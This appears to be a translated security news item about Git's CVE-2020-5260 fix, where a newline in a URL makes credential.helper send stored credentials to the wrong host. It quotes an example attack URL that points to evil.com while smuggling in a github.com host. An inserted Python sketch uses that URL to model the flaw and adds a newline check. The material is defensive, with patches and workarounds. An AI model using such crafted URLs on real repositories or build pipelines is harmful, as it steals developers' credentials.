Git credential leak vulnerability

Corrective releases of the distributed source control system Git have been published: 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4. They fix a vulnerability (CVE-2020-5260) in the "credential.helper" handler that causes credentials to be sent to the wrong host when a git client accesses a repository using a specially formatted URL containing a newline character. The vulnerability can be used to arrange for credentials belonging to another host to be sent to a server controlled by the attacker.

When a URL such as "https://evil.com?%0ahost=github.com/" is specified, the credential handler, while connecting to the host evil.com, will pass along the authentication parameters stored for github.com. The problem occurs during operations such as "git clone", including the processing of submodule URLs (for example, "git submodule update" automatically processes the URLs listed in the repository's .gitmodules file). The vulnerability is most dangerous where a developer clones a repository without seeing the URL, for example when working with submodules, or on systems that perform automated actions, for example in package build scripts.

To block the vulnerability, the new versions prohibit a newline character in any value passed through the credential exchange protocol. For distributions, the release of package updates can be tracked on these pages: Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.
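The following sketch is an added example, not code from Git or from the original article. It models the credential exchange as newline-separated key=value lines and shows why a decoded newline in the host value changes what a helper sees, and how the check described above stops it. The function names, the simplified URL splitting and the "later key overrides earlier" helper behaviour are assumptions of this model.

```python
from urllib.parse import unquote

# Constructed sample input: the URL quoted in the article plus an ordinary one.
SAMPLE_URLS = [
    "https://github.com/git/git",
    "https://evil.com?%0ahost=github.com/",
]

def split_url(url):
    """Simplified split into (protocol, host, path); host runs up to the first '/'."""
    protocol, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return protocol, unquote(host), unquote(path)

def serialize(attrs, strict):
    """Write attributes as key=value lines, one per line.
    strict=True applies the fix: no newline allowed in any value."""
    lines = []
    for key, value in attrs:
        if strict and "\n" in value:
            raise ValueError(f"newline in credential value for {key!r}")
        lines.append(f"{key}={value}\n")
    return "".join(lines)

def helper_parse(message):
    """Model of a helper reading line by line; a later key overrides an earlier one."""
    seen = {}
    for line in message.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            seen[key] = value
    return seen

def helper_host(url, strict):
    """Host the modelled helper would look credentials up for."""
    protocol, host, _path = split_url(url)
    message = serialize([("protocol", protocol), ("host", host)], strict)
    return helper_parse(message)["host"]

def unsafe_urls(urls):
    """Defensive check: URLs with a newline in any percent-decoded component."""
    return [u for u in urls if any("\n" in part for part in split_url(u))]

if __name__ == "__main__":
    print("without check:", helper_host(SAMPLE_URLS[1], strict=False))
    print("flagged:", unsafe_urls(SAMPLE_URLS))
```

The same `unsafe_urls` check can be run over the `url` values of a .gitmodules file before submodules of an unverified repository are fetched.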

As a workaround, it is recommended not to use credential.helper when accessing public repositories and not to use "git clone" in "--recurse-submodules" mode with unverified repositories. To completely disable the credential.helper handler, which saves and retrieves passwords from a cache, protected storage or a password file, you can use the commands:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Source: opennet.ru
